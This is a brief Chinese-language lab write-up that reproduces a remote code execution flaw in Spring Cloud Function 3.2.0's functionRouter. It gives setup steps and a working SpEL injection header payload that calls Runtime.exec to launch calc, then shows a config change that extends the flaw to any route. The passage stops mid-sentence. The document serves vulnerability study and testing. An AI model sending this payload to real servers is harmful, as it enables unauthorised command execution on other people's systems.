复现
0.源码下载和环境配置
在github上down下存在漏洞的源码:https://github.com/spring-cloud/spring-cloud-function/releases/tag/v3.2.0
在spring-cloud-function-3.2.0\spring-cloud-function-3.2.0\spring-cloud-function-samples目录下使用idea直接打开function-sample
1.使用默认配置下functionRouter路由复现
直接运行src/main/java/com/example/SampleApplication.java
默认端口为8080,可在src/main/resources/application.properties中添加server.port = 8888
进行端口修改。
默认页面为:
burp对存在漏洞的路由functionRouter进行post发包可执行任意命令。
payload为spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc")
2.修改默认设置使任意路由可触发:
在src/main/resources/application.properties中添加spring.cloud.function.definition:functionRouter
造成任意路